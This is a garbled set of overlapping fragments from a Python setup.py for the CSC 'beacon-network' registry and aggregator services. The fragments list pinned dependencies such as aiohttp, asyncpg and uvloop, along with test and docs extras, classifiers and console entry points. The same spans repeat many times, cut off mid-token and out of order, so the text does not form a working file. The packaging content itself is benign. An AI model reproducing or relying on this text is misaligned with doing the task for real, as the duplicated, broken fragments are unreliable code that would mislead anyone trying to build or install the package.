\"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT", "\"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\",", "Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\",", "\"License :: OSI Approved :: Apache Software License\", \"Programming Language :: Python ::", "packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\",", "python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\",", "\"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"], },", "\"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\",", "description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for", "[ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\":", "\"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx", "project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status", "], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"], }, )", "\"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >=", "'3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\",", "Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet ::", "install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version", "Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[", "\"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License", "- Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP", "3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP ::", "\"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet" ]